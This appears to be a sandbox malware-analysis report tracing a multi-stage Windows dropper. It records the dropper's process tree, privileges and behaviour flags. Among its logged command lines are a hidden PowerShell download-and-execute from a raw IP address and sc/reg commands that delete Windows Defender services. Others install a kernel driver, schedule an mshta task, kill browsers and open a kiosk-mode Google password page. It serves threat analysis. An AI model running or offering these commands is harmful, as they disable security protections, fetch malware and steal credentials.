Token: SeDebugPrivilege | 7900 | powershell.exe
Token: SeDebugPrivilege | 5784 | powershell.exe
Token: SeDebugPrivilege | 10556 | 923a15a9.exe
Token: SeBackupPrivilege | 10556 | 923a15a9.exe
Token: SeRestorePrivilege | 10556 | 923a15a9.exe
Token: SeLoadDriverPrivilege | 10556 | 923a15a9.exe
Token: SeShutdownPrivilege | 10556 | 923a15a9.exe
Token: SeSystemEnvironmentPrivilege | 10556 | 923a15a9.exe
Token: SeSecurityPrivilege | 10556 | 923a15a9.exe
Token: SeDebugPrivilege | 11556 | taskkill.exe
Token: SeBackupPrivilege | 10556 | 923a15a9.exe
Token: SeRestorePrivilege | 10556 | 923a15a9.exe
Token: SeDebugPrivilege | 10556 | 923a15a9.exe
Token: SeSystemEnvironmentPrivilege | 10556 | 923a15a9.exe
Token: SeSecurityPrivilege | 10556 | 923a15a9.exe
Token: SeCreatePermanentPrivilege | 10556 | 923a15a9.exe
Token: SeShutdownPrivilege | 10556 | 923a15a9.exe
Token: SeLoadDriverPrivilege | 10556 | 923a15a9.exe
Token: SeIncreaseQuotaPrivilege | 10556 | 923a15a9.exe
Token: SeSecurityPrivilege | 10556 | 923a15a9.exe
Token: SeSystemProfilePrivilege | 10556 | 923a15a9.exe
Token: SeDebugPrivilege | 10556 | 923a15a9.exe
Token: SeMachineAccountPrivilege | 10556 | 923a15a9.exe
Token: SeCreateTokenPrivilege | 10556 | 923a15a9.exe
Token: SeAssignPrimaryTokenPrivilege | 10556 | 923a15a9.exe
Token: SeTcbPrivilege | 10556 | 923a15a9.exe
Token: SeAuditPrivilege | 10556 | 923a15a9.exe
Token: SeSystemEnvironmentPrivilege | 10556 | 923a15a9.exe
Token: SeLoadDriverPrivilege | 10556 | 923a15a9.exe
Token: SeLoadDriverPrivilege | 10556 | 923a15a9.exe
Token: SeIncreaseQuotaPrivilege | 10556 | 923a15a9.exe
Token: SeSecurityPrivilege | 10556 | 923a15a9.exe
Token: SeSystemProfilePrivilege | 10556 | 923a15a9.exe
Token: SeDebugPrivilege | 10556 | 923a15a9.exe
Token: SeMachineAccountPrivilege | 10556 | 923a15a9.exe
Token: SeCreateTokenPrivilege | 10556 | 923a15a9.exe
Token: SeAssignPrimaryTokenPrivilege | 10556 | 923a15a9.exe
Token: SeTcbPrivilege | 10556 | 923a15a9.exe
Token: SeAuditPrivilege | 10556 | 923a15a9.exe
Token: SeSystemEnvironmentPrivilege | 10556 | 923a15a9.exe
Token: SeDebugPrivilege | 12980 | taskkill.exe
Token: SeDebugPrivilege | 7136 | taskkill.exe
Token: SeDebugPrivilege | 1832 | taskkill.exe
Token: SeDebugPrivilege | 7368 | taskkill.exe
Token: SeDebugPrivilege | 8812 | firefox.exe
Token: SeDebugPrivilege | 8812 | firefox.exe
Token: SeDebugPrivilege | 8156 | 1072de6716.exe
Suspicious use of FindShellTrayWindow 30 IoCs
pid | Process
5608 | 61260d7384abdbdf1ca775670bc8c19a0fae83b36f5c45913f8309fe15ce2af9.exe
6276 | 6a162b453f.exe (×11)
8812 | firefox.exe (×18)
Suspicious use of SendNotifyMessage 23 IoCs
pid | Process
6276 | 6a162b453f.exe (×11)
8812 | firefox.exe (×12)
Suspicious use of SetWindowsHookEx 1 IoCs
pid | Process
8812 | firefox.exe
Suspicious use of WriteProcessMemory 64 IoCs
description | pid | Process | procid_target
PID 5608 wrote to memory of 1904 | 5608 | 61260d7384abdbdf1ca775670bc8c19a0fae83b36f5c45913f8309fe15ce2af9.exe | 90 (×3)
PID 1904 wrote to memory of 2960 | 1904 | rapes.exe | 96 (×3)
PID 2960 wrote to memory of 3964 | 2960 | apple.exe | 97 (×3)
PID 3964 wrote to memory of 5436 | 3964 | 11.exe | 99 (×2)
PID 5436 wrote to memory of 1624 | 5436 | cmd.exe | 101 (×3)
PID 1624 wrote to memory of 4388 | 1624 | 11.exe | 102 (×2)
PID 4388 wrote to memory of 5524 | 4388 | cmd.exe | 104 (×2)
PID 4388 wrote to memory of 1996 | 4388 | cmd.exe | 105 (×2)
PID 4388 wrote to memory of 1132 | 4388 | cmd.exe | 106 (×2)
PID 4388 wrote to memory of 428 | 4388 | cmd.exe | 108 (×2)
PID 4388 wrote to memory of 1064 | 4388 | cmd.exe | 109 (×2)
PID 4388 wrote to memory of 4112 | 4388 | cmd.exe | 110 (×2)
PID 4388 wrote to memory of 392 | 4388 | cmd.exe | 111 (×2)
PID 4388 wrote to memory of 4040 | 4388 | cmd.exe | 112 (×2)
PID 4388 wrote to memory of 624 | 4388 | cmd.exe | 113 (×2)
PID 4388 wrote to memory of 1652 | 4388 | cmd.exe | 114 (×2)
PID 4388 wrote to memory of 2248 | 4388 | cmd.exe | 115 (×2)
PID 4388 wrote to memory of 2464 | 4388 | cmd.exe | 116 (×2)
PID 4388 wrote to memory of 4936 | 4388 | cmd.exe | 117 (×2)
PID 4388 wrote to memory of 5100 | 4388 | cmd.exe | 118 (×2)
PID 4388 wrote to memory of 4580 | 4388 | cmd.exe | 119 (×2)
PID 4388 wrote to memory of 5272 | 4388 | cmd.exe | 120 (×2)
PID 4388 wrote to memory of 4200 | 4388 | cmd.exe | 121 (×2)
PID 4388 wrote to memory of 3548 | 4388 | cmd.exe | 122 (×2)
PID 4388 wrote to memory of 432 | 4388 | cmd.exe | 123 (×2)
PID 4388 wrote to memory of 2536 | 4388 | cmd.exe | 124 (×2)
PID 4388 wrote to memory of 5344 | 4388 | cmd.exe | 125 (×2)
PID 4388 wrote to memory of 5460 | 4388 | cmd.exe | 126 (×2)
PID 4388 wrote to memory of 3916 | 4388 | cmd.exe | 127 (×2)
PID 4388 wrote to memory of 1492 | 4388 | cmd.exe | 128 (×2)
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes

C:\Users\Admin\AppData\Local\Temp\61260d7384abdbdf1ca775670bc8c19a0fae83b36f5c45913f8309fe15ce2af9.exe  "C:\Users\Admin\AppData\Local\Temp\61260d7384abdbdf1ca775670bc8c19a0fae83b36f5c45913f8309fe15ce2af9.exe"  (depth 1)
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:5608

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe  "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"  (depth 2)
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1904

C:\Users\Admin\AppData\Local\Temp\10336600101\apple.exe  "C:\Users\Admin\AppData\Local\Temp\10336600101\apple.exe"  (depth 3)
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2960

C:\Users\Admin\AppData\Local\Temp\11.exe  "C:\Users\Admin\AppData\Local\Temp\11.exe"  (depth 4)
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3964

C:\Windows\system32\cmd.exe  "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\926C.tmp\926D.tmp\926E.bat C:\Users\Admin\AppData\Local\Temp\11.exe"  (depth 5)
- Suspicious use of WriteProcessMemory
PID:5436

C:\Users\Admin\AppData\Local\Temp\11.exe  "C:\Users\Admin\AppData\Local\Temp\11.exe" go  (depth 6)
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1624

C:\Windows\system32\cmd.exe  "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\9402.tmp\9403.tmp\9404.bat C:\Users\Admin\AppData\Local\Temp\11.exe go"  (depth 7)
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:4388
C:\Windows\system32\sc.exe  sc create ddrver type= kernel binPath= "C:\Users\Admin\AppData\Local\Temp\ssisd.sys"  (depth 8)
- Launches sc.exe
PID:5524

C:\Windows\system32\sc.exe  sc start ddrver  (depth 8)
- Launches sc.exe
PID:1996

C:\Windows\system32\timeout.exe  timeout /t 1  (depth 8)
- Delays execution with timeout.exe
PID:1132

C:\Windows\system32\sc.exe  sc stop ddrver  (depth 8)
- Launches sc.exe
PID:428

C:\Windows\system32\sc.exe  sc start ddrver  (depth 8)
- Launches sc.exe
PID:1064

C:\Windows\system32\takeown.exe  takeown /f "C:\ProgramData\Microsoft\Windows Defender" /r /d y  (depth 8)
- Possible privilege escalation attempt
- Modifies file permissions
PID:4112

C:\Windows\system32\icacls.exe  icacls "C:\ProgramData\Microsoft\Windows Defender" /grant administrators:F /t  (depth 8)
- Possible privilege escalation attempt
- Modifies file permissions
PID:392

C:\Windows\system32\sc.exe  sc stop "WinDefend"  (depth 8)
- Launches sc.exe
PID:4040

C:\Windows\system32\sc.exe  sc delete "WinDefend"  (depth 8)
- Launches sc.exe
PID:624

C:\Windows\system32\reg.exe  reg delete "HKLM\System\CurrentControlset\Services\WinDefend" /f  (depth 8)
PID:1652

C:\Windows\system32\sc.exe  sc stop "MDCoreSvc"  (depth 8)
- Launches sc.exe
PID:2248

C:\Windows\system32\sc.exe  sc delete "MDCoreSvc"  (depth 8)
- Launches sc.exe
PID:2464

C:\Windows\system32\reg.exe  reg delete "HKLM\System\CurrentControlset\Services\MDCoreSvc" /f  (depth 8)
PID:4936

C:\Windows\system32\sc.exe  sc stop "WdNisSvc"  (depth 8)
- Launches sc.exe
PID:5100

C:\Windows\system32\sc.exe  sc delete "WdNisSvc"  (depth 8)
- Launches sc.exe
PID:4580

C:\Windows\system32\reg.exe  reg delete "HKLM\System\CurrentControlset\Services\WdNisSvc" /f  (depth 8)
PID:5272

C:\Windows\system32\sc.exe  sc stop "Sense"  (depth 8)
- Launches sc.exe
PID:4200

C:\Windows\system32\sc.exe  sc delete "Sense"  (depth 8)
- Launches sc.exe
PID:3548

C:\Windows\system32\reg.exe  reg delete "HKLM\System\CurrentControlset\Services\Sense" /f  (depth 8)
PID:432

C:\Windows\system32\sc.exe  sc stop "wscsvc"  (depth 8)
- Launches sc.exe
PID:2536

C:\Windows\system32\sc.exe  sc delete "wscsvc"  (depth 8)
- Launches sc.exe
PID:5344

C:\Windows\system32\reg.exe  reg delete "HKLM\System\CurrentControlset\Services\wscsvc" /f  (depth 8)
- Modifies security service
PID:5460

C:\Windows\system32\sc.exe  sc stop "SgrmBroker"  (depth 8)
- Launches sc.exe
PID:3916

C:\Windows\system32\sc.exe  sc delete "SgrmBroker"  (depth 8)
- Launches sc.exe
PID:1492

C:\Windows\system32\reg.exe  reg delete "HKLM\System\CurrentControlset\Services\SgrmBroker" /f  (depth 8)
PID:3620

C:\Windows\system32\sc.exe  sc stop "SecurityHealthService"  (depth 8)
- Launches sc.exe
PID:2128

C:\Windows\system32\sc.exe  sc delete "SecurityHealthService"  (depth 8)
- Launches sc.exe
PID:756

C:\Windows\system32\reg.exe  reg delete "HKLM\System\CurrentControlset\Services\SecurityHealthService" /f  (depth 8)
PID:1488

C:\Windows\system32\sc.exe  sc stop "webthreatdefsvc"  (depth 8)
- Launches sc.exe
PID:856

C:\Windows\system32\sc.exe  sc delete "webthreatdefsvc"  (depth 8)
- Launches sc.exe
PID:928

C:\Windows\system32\reg.exe  reg delete "HKLM\System\CurrentControlset\Services\webthreatdefsvc" /f  (depth 8)
PID:2624

C:\Windows\system32\sc.exe  sc stop "webthreatdefusersvc"  (depth 8)
- Launches sc.exe
PID:5920

C:\Windows\system32\sc.exe  sc delete "webthreatdefusersvc"  (depth 8)
- Launches sc.exe
PID:5828

C:\Windows\system32\reg.exe  reg delete "HKLM\System\CurrentControlset\Services\webthreatdefusersvc" /f  (depth 8)
PID:6124

C:\Windows\system32\sc.exe  sc stop "WdNisDrv"  (depth 8)
- Launches sc.exe
PID:1468

C:\Windows\system32\sc.exe  sc delete "WdNisDrv"  (depth 8)
- Launches sc.exe
PID:4620

C:\Windows\system32\reg.exe  reg delete "HKLM\System\CurrentControlset\Services\WdNisDrv" /f  (depth 8)
PID:3580

C:\Windows\system32\sc.exe  sc stop "WdBoot"  (depth 8)
- Launches sc.exe
PID:3536

C:\Windows\system32\sc.exe  sc delete "WdBoot"  (depth 8)
- Launches sc.exe
PID:3056

C:\Windows\system32\reg.exe  reg delete "HKLM\System\CurrentControlset\Services\WdBoot" /f  (depth 8)
PID:3600

C:\Windows\system32\sc.exe  sc stop "WdFilter"  (depth 8)
- Launches sc.exe
PID:4280

C:\Windows\system32\sc.exe  sc delete "WdFilter"  (depth 8)
- Launches sc.exe
PID:4380

C:\Windows\system32\reg.exe  reg delete "HKLM\System\CurrentControlset\Services\WdFilter" /f  (depth 8)
PID:5588

C:\Windows\system32\sc.exe  sc stop "SgrmAgent"  (depth 8)
- Launches sc.exe
PID:376

C:\Windows\system32\sc.exe  sc delete "SgrmAgent"  (depth 8)
- Launches sc.exe
PID:5420

C:\Windows\system32\reg.exe  reg delete "HKLM\System\CurrentControlset\Services\SgrmAgent" /f  (depth 8)
PID:3012

C:\Windows\system32\sc.exe  sc stop "MsSecWfp"  (depth 8)
- Launches sc.exe
PID:5388

C:\Windows\system32\sc.exe  sc delete "MsSecWfp"  (depth 8)
- Launches sc.exe
PID:904

C:\Windows\system32\reg.exe  reg delete "HKLM\System\CurrentControlset\Services\MsSecWfp" /f  (depth 8)
PID:4904

C:\Windows\system32\sc.exe  sc stop "MsSecFlt"  (depth 8)
- Launches sc.exe
PID:5416

C:\Windows\system32\sc.exe  sc delete "MsSecFlt"  (depth 8)
- Launches sc.exe
PID:5712

C:\Windows\system32\reg.exe  reg delete "HKLM\System\CurrentControlset\Services\MsSecFlt" /f  (depth 8)
PID:5196

C:\Windows\system32\sc.exe  sc stop "MsSecCore"  (depth 8)
- Launches sc.exe
PID:3272

C:\Windows\system32\sc.exe  sc delete "MsSecCore"  (depth 8)
- Launches sc.exe
PID:5268

C:\Windows\system32\reg.exe  reg delete "HKLM\System\CurrentControlset\Services\MsSecCore" /f  (depth 8)
PID:4520

C:\Windows\system32\schtasks.exe  schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /f  (depth 8)
PID:1708

C:\Windows\system32\schtasks.exe  schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /f  (depth 8)
PID:2240

C:\Windows\system32\schtasks.exe  schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /f  (depth 8)
PID:4092

C:\Windows\system32\schtasks.exe  schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /f  (depth 8)
PID:6020

C:\Windows\system32\sc.exe  sc stop ddrver  (depth 8)
- Launches sc.exe
PID:2996

C:\Windows\system32\sc.exe  sc delete ddrver  (depth 8)
- Launches sc.exe
PID:2192
C:\Users\Admin\AppData\Local\Temp\10337510101\f73ae_003.exe  "C:\Users\Admin\AppData\Local\Temp\10337510101\f73ae_003.exe"  (depth 3)
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
PID:2928

C:\Windows\SYSTEM32\cmd.exe  cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:'  (depth 4)
PID:3132

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  powershell.exe Add-MpPreference -ExclusionPath 'C:'  (depth 5)
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2472

C:\Windows\system32\svchost.exe  "C:\Windows\system32\svchost.exe"  (depth 4)
- Downloads MZ/PE file
- Adds Run key to start application
PID:5384

C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe  "C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe" ""  (depth 5)
- Executes dropped EXE
PID:2244

C:\Users\Admin\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe  "C:\Users\Admin\AppData\Local\Temp\\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe" ""  (depth 5)
- Deletes itself
- Executes dropped EXE
PID:3584

C:\Users\Admin\AppData\Local\Temp\{211963d6-b0d3-4cab-90f0-b5ce54eefe0c}\44ae5ee5.exe  "C:\Users\Admin\AppData\Local\Temp\{211963d6-b0d3-4cab-90f0-b5ce54eefe0c}\44ae5ee5.exe" -accepteula -adinsilent -silent -processlevel 2 -postboot  (depth 6)
- Executes dropped EXE
- Checks for VirtualBox DLLs, possible anti-VM trick
- System Location Discovery: System Language Discovery
PID:9384

C:\Users\Admin\AppData\Local\Temp\{cdfce00f-9db3-471f-b4d9-5817cd23d4aa}\923a15a9.exe  C:/Users/Admin/AppData/Local/Temp/{cdfce00f-9db3-471f-b4d9-5817cd23d4aa}/\923a15a9.exe -accepteula -adinsilent -silent -processlevel 2 -postboot  (depth 7)
- Drops file in Drivers directory
- Sets service image path in registry
- Executes dropped EXE
- Impair Defenses: Safe Mode Boot
- Loads dropped DLL
- Adds Run key to start application
- Enumerates connected drives
- Writes to the Master Boot Record (MBR)
- Checks for VirtualBox DLLs, possible anti-VM trick
- System Location Discovery: System Language Discovery
- Suspicious behavior: LoadsDriver
- Suspicious use of AdjustPrivilegeToken
PID:10556
C:\Users\Admin\AppData\Local\Temp\10337820101\7IIl2eE.exe  "C:\Users\Admin\AppData\Local\Temp\10337820101\7IIl2eE.exe"  (depth 3)
- Checks computer location settings
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:1160

C:\Windows\SysWOW64\CMD.exe  "C:\Windows\system32\CMD.exe" /c copy Expectations.cab Expectations.cab.bat & Expectations.cab.bat  (depth 4)
- System Location Discovery: System Language Discovery
PID:5372

C:\Windows\SysWOW64\cmd.exe  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\10338050121\am_no.cmd" "  (depth 3)
- System Location Discovery: System Language Discovery
PID:4448

C:\Windows\SysWOW64\timeout.exe  timeout /t 2  (depth 4)
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:5068

C:\Windows\SysWOW64\cmd.exe  C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"  (depth 4)
- System Location Discovery: System Language Discovery
PID:7304

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"  (depth 5)
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:7344

C:\Windows\SysWOW64\cmd.exe  C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"  (depth 4)
- System Location Discovery: System Language Discovery
PID:7656

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"  (depth 5)
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:7672

C:\Windows\SysWOW64\cmd.exe  C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"  (depth 4)
- System Location Discovery: System Language Discovery
PID:7876

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"  (depth 5)
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:7900

C:\Windows\SysWOW64\schtasks.exe  schtasks /create /tn "kHWKwmazc06" /tr "mshta \"C:\Temp\ZN1OPuE5k.hta\"" /sc minute /mo 25 /ru "Admin" /f  (depth 4)
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:8140

C:\Windows\SysWOW64\mshta.exe  mshta "C:\Temp\ZN1OPuE5k.hta"  (depth 4)
- Checks computer location settings
- System Location Discovery: System Language Discovery
PID:1896

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;  (depth 5)
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5784

C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe  "C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"  (depth 6)
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:8524
C:\Users\Admin\AppData\Local\Temp\10338160101\73998ddf32.exe  "C:\Users\Admin\AppData\Local\Temp\10338160101\73998ddf32.exe"  (depth 3)
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4512

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"  (depth 4)
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2600

C:\Users\Admin\AppData\Local\Temp\10338170101\64145b6cb6.exe  "C:\Users\Admin\AppData\Local\Temp\10338170101\64145b6cb6.exe"  (depth 3)
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3692

C:\Users\Admin\AppData\Local\Temp\10338180101\1ced906bca.exe  "C:\Users\Admin\AppData\Local\Temp\10338180101\1ced906bca.exe"  (depth 3)
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:9516

C:\Users\Admin\AppData\Local\Temp\10338190101\6a162b453f.exe  "C:\Users\Admin\AppData\Local\Temp\10338190101\6a162b453f.exe"  (depth 3)
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:6276

C:\Windows\SysWOW64\taskkill.exe  taskkill /F /IM firefox.exe /T  (depth 4)
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:11556

C:\Windows\SysWOW64\taskkill.exe  taskkill /F /IM chrome.exe /T  (depth 4)
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:12980

C:\Windows\SysWOW64\taskkill.exe  taskkill /F /IM msedge.exe /T  (depth 4)
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:7136

C:\Windows\SysWOW64\taskkill.exe  taskkill /F /IM opera.exe /T  (depth 4)
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1832

C:\Windows\SysWOW64\taskkill.exe  taskkill /F /IM brave.exe /T  (depth 4)
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:7368

C:\Program Files\Mozilla Firefox\firefox.exe  "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking  (depth 4)
PID:8784

C:\Program Files\Mozilla Firefox\firefox.exe  "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking  (depth 5)
- Checks processor information in registry
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:8812

C:\Program Files\Mozilla Firefox\firefox.exe  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2012 -prefsLen 27099 -prefMapHandle 2016 -prefMapSize 270279 -ipcHandle 2092 -initialChannelId {ed11dde3-f8c1-4521-9fd9-8eab04523e3b} -parentPid 8812 -crashReporter "\\.\pipe\gecko-crash-server-pipe.8812" -appDir "C:\Program Files\Mozilla Firefox\browser" - 1 gpu  (depth 6)
PID:6292

C:\Program Files\Mozilla Firefox\firefox.exe  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2496 -prefsLen 27135 -prefMapHandle 2500 -prefMapSize 270279 -ipcHandle 2508 -initialChannelId {24d86670-7e1d-4893-80e9-5986b957f1cb} -parentPid 8812 -crashReporter "\\.\pipe\gecko-crash-server-pipe.8812" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 2 socket  (depth 6)
PID:1968

C:\Program Files\Mozilla Firefox\firefox.exe  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 3704 -prefsLen 25164 -prefMapHandle 3708 -prefMapSize 270279 -jsInitHandle 3712 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 3720 -initialChannelId {a96dae30-52da-47a5-8103-296135d0bccc} -parentPid 8812 -crashReporter "\\.\pipe\gecko-crash-server-pipe.8812" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 3 tab  (depth 6)
- Checks processor information in registry
PID:8108

C:\Program Files\Mozilla Firefox\firefox.exe  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 3904 -prefsLen 27276 -prefMapHandle 3908 -prefMapSize 270279 -ipcHandle 3928 -initialChannelId {37f8c179-5b71-4ee1-aac0-eae98d1336b6} -parentPid 8812 -crashReporter "\\.\pipe\gecko-crash-server-pipe.8812" -appDir "C:\Program Files\Mozilla Firefox\browser" - 4 rdd  (depth 6)
PID:8024

C:\Program Files\Mozilla Firefox\firefox.exe  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 4436 -prefsLen 34775 -prefMapHandle 4440 -prefMapSize 270279 -jsInitHandle 4444 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 2824 -initialChannelId {c2ee3eee-865d-40c3-9a27-59c0edf4811e} -parentPid 8812 -crashReporter "\\.\pipe\gecko-crash-server-pipe.8812" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 5 tab  (depth 6)
- Checks processor information in registry
PID:7192

C:\Program Files\Mozilla Firefox\firefox.exe  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -sandboxingKind 0 -prefsHandle 4356 -prefsLen 35012 -prefMapHandle 4364 -prefMapSize 270279 -ipcHandle 5044 -initialChannelId {71736cb4-40df-44de-935b-0dadb83712fa} -parentPid 8812 -crashReporter "\\.\pipe\gecko-crash-server-pipe.8812" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 6 utility  (depth 6)
- Checks processor information in registry
PID:10460

C:\Program Files\Mozilla Firefox\firefox.exe  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 4352 -prefsLen 32952 -prefMapHandle 5568 -prefMapSize 270279 -jsInitHandle 5572 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5628 -initialChannelId {15131b5e-c5b4-4b1b-80d2-d0265768599a} -parentPid 8812 -crashReporter "\\.\pipe\gecko-crash-server-pipe.8812" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 7 tab  (depth 6)
- Checks processor information in registry
PID:11200

C:\Program Files\Mozilla Firefox\firefox.exe  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5588 -prefsLen 32952 -prefMapHandle 5592 -prefMapSize 270279 -jsInitHandle 5596 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5636 -initialChannelId {73813176-3ebc-4417-9a4d-47580bdb29da} -parentPid 8812 -crashReporter "\\.\pipe\gecko-crash-server-pipe.8812" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 8 tab  (depth 6)
- Checks processor information in registry
PID:11224

